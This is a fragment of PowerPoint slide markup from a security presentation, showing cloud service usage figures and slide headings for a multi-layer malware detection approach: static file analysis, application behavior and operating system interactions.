            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Miniaturization is shrinking computing form factors, all powered by cloud services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466226" indent="-346486" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB and Enterprises seeking IT services through SaaS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1398968" lvl="2" indent="-346486" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversaries and threats following them to the           	cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1398968" lvl="2" indent="-346486" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Customers adapting to cloud threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152276" y="1212849"/>
            <a:ext cx="4210053" cy="5619057"/>
            <a:chOff x="9408" y="1213764"/>
            <a:chExt cx="4127878" cy="5509380"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="25000"/>
              <a:lumOff val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9408" y="1213764"/>
              <a:ext cx="3363258" cy="5509380"/>
              <a:chOff x="9408" y="1213764"/>
              <a:chExt cx="3363258" cy="5509380"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="15" name="Group 14"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="9408" y="1213764"/>
                <a:ext cx="3319760" cy="5509380"/>
                <a:chOff x="9408" y="1213764"/>
                <a:chExt cx="3319760" cy="5509380"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="17" name="Group 16"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="9408" y="1213764"/>
                  <a:ext cx="3319760" cy="5509380"/>
                  <a:chOff x="9408" y="1213764"/>
                  <a:chExt cx="3319760" cy="5509380"/>
                </a:xfrm>
                <a:grpFill/>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="19" name="Group 18"/>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="269241" y="1213764"/>
                    <a:ext cx="2844431" cy="5502128"/>
                    <a:chOff x="274639" y="1237605"/>
                    <a:chExt cx="2901467" cy="5612457"/>
                  </a:xfrm>
                  <a:grpFill/>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="22" name="Rounded Rectangle 4"/>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="274639" y="1237605"/>
                      <a:ext cx="2901467" cy="5612457"/>
                    </a:xfrm>
                    <a:prstGeom prst="roundRect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:grpFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:ln>
                    <a:scene3d>
                      <a:camera prst="perspectiveRigh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370" y="2364913"/>
                      <a:ext cx="963949" cy="886704"/>
                    </a:xfrm>
                    <a:prstGeom prst="ellipse">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:grpFill/>
                    <a:ln w="63500" cap="rnd">
                      <a:solidFill>
                        <a:srgbClr val="333333"/>
                      </a:solidFill>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="381000" dist="292100" dir="5400000" sx="-80000" sy="-18000" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="22000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:scene3d>
                      <a:camera prst="perspectiveRight"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                  </p:spPr>
                </p:pic>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="24" name="Rectangle 23"/>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="1234247" y="2326785"/>
                      <a:ext cx="1739428" cy="1167473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </p:spPr>
                  <p:txBody>
                    <a:bodyPr wrap="square">
                      <a:spAutoFit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="460287" lvl="2" algn="ctr" defTabSz="932563"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1397" kern="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The new form factors: Dual core, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1397" kern="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WiFi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1397" kern="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, Bluetooth, runs Linux</a:t>
                      </a:r>
                    </a:p>
                  </p:txBody>
                </p:sp>
              </p:grpSp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="20" name="Rectangle 19"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="9408" y="3536246"/>
                    <a:ext cx="2911396" cy="3186898"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" b="1" kern="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>OneDrive</a:t>
                    </a:r>
                    <a:endParaRPr lang="en-US" sz="1399" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="windowText" lastClr="000000"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>12 billion files</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:endParaRPr lang="en-US" sz="1071" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="windowText" lastClr="000000"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" b="1" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>Skype </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>is the largest long distance provider</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="751723" lvl="2" indent="-291436" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>2 Billion </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>mins</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>/day</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:endParaRPr lang="en-US" sz="918" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="windowText" lastClr="000000"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" b="1" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>O365</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>32M paid seats, 600K paid tenants</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>35 PB of email data</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>15B messages per month</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:endParaRPr lang="en-US" sz="1224" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="windowText" lastClr="000000"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr marL="460287" lvl="2" defTabSz="932563"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" b="1" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>Outlook.com</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr marL="631704" lvl="2" indent="-171417" defTabSz="932563">
                      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      <a:buChar char="•"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1399" kern="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>400 Million active users</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="21" name="Picture 20"/>
                  <p:cNvPicPr>
                    <a:picLocks noChangeAspect="1"/>
                  </p:cNvPicPr>
                  <p:nvPr/>
                </p:nvPicPr>
                <p:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </p:blipFill>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="1867808" y="3618825"/>
                    <a:ext cx="1461360" cy="363772"/>
                  </a:xfrm>
                  <a:prstGeom prst="roundRect">
                    <a:avLst>
                      <a:gd name="adj" fmla="val 16667"/>
                    </a:avLst>
                  </a:prstGeom>
                  <a:grpFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="76200" dist="38100" dir="7800000" algn="tl" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="perspectiveRight"/>
                    <a:lightRig rig="contrasting" dir="t">
                      <a:rot lat="0" lon="0" rev="4200000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d prstMaterial="plastic">
                    <a:bevelT w="381000" h="114300" prst="relaxedInset"/>
                    <a:contourClr>
                      <a:srgbClr val="969696"/>
                    </a:contourClr>
                  </a:sp3d>
                </p:spPr>
              </p:pic>
            </p:grpSp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Picture 17"/>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1107560" y="1261836"/>
                  <a:ext cx="1167792" cy="851974"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:grpFill/>
                <a:effectLst>
                  <a:softEdge rad="31750"/>
                </a:effectLst>
              </p:spPr>
            </p:pic>
          </p:gr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630686" y="4150319"/>
                <a:ext cx="741980" cy="431698"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="76200" dist="38100" dir="7800000" algn="tl" rotWithShape="0">
                  <a:srgbClr val="000000">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:scene3d>
                <a:camera prst="perspectiveRight"/>
                <a:lightRig rig="contrasting" dir="t">
                  <a:rot lat="0" lon="0" rev="4200000"/>
                </a:lightRig>
              </a:scene3d>
              <a:sp3d prstMaterial="plastic">
                <a:bevelT w="381000" h="114300" prst="relaxedInset"/>
                <a:contourClr>
                  <a:srgbClr val="969696"/>
                </a:contourClr>
              </a:sp3d>
            </p:spPr>
          </p:pic>
        </p:gr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5863" y="4956662"/>
              <a:ext cx="1321423" cy="414596"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:grp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515" y="6061673"/>
              <a:ext cx="520700" cy="390525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:scene3d>
              <a:camera prst="perspectiveRight"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3115936" y="1237926"/>
            <a:ext cx="4184426" cy="1773703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="10800000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="27940" h="12700"/>
              <a:contourClr>
                <a:srgbClr val="DDDDDD"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="3599" b="1" kern="0" spc="150" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>The Race for the Mastery of the Cyber Domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73383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734191" y="3018499"/>
            <a:ext cx="5870209" cy="3661440"/>
            <a:chOff x="328471" y="2959581"/>
            <a:chExt cx="5755629" cy="3589973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18"/>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99592" y="3005109"/>
              <a:ext cx="5630781" cy="3519237"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="328471" y="2959581"/>
              <a:ext cx="5755629" cy="35899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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4393843" y="3160180"/>
              <a:ext cx="1061326" cy="61065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393843" y="5400138"/>
              <a:ext cx="1061326" cy="61065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798379" y="3160180"/>
              <a:ext cx="858930" cy="58603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581527" y="5400138"/>
              <a:ext cx="1112641" cy="58907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US" dirty="0"/>
              <a:t>Multiple-layer Detection Approach</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2508266" y="1433497"/>
            <a:ext cx="2591592" cy="1561783"/>
            <a:chOff x="2067918" y="1405517"/>
            <a:chExt cx="2541007" cy="1531299"/>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918" y="1405517"/>
              <a:ext cx="2541007" cy="1338264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="16200000">
              <a:off x="3099339" y="2436426"/>
              <a:ext cx="640725" cy="360056"/>
              <a:chOff x="4450080" y="3958084"/>
              <a:chExt cx="1637703" cy="284754"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="4450080" y="3958084"/>
                <a:ext cx="1637703" cy="52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4450080" y="4237590"/>
                <a:ext cx="1637703" cy="52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254" y="3534495"/>
            <a:ext cx="2265604" cy="2341025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3394803" y="4151951"/>
            <a:ext cx="1196841" cy="1494899"/>
            <a:chOff x="838200" y="1608444"/>
            <a:chExt cx="1173480" cy="1465720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle: Folded Corner 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="838200" y="1608444"/>
              <a:ext cx="1173480" cy="1465720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">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defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1836" kern="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>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880" y="1824244"/>
              <a:ext cx="1034120" cy="1034120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069065" y="1900622"/>
            <a:ext cx="4025809" cy="958583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Static File Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed Icon, Obfuscated Macro, Specific Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069065" y="3124847"/>
            <a:ext cx="4025809" cy="958583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Application Behavior Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checks Recent File count, Shell Breakout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069066" y="4069088"/>
            <a:ext cx="4025809" cy="958583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Operating System Interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypts Files, Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069065" y="4984489"/>
            <a:ext cx="4025809" cy="1246721"/>
          </a:xfrm>
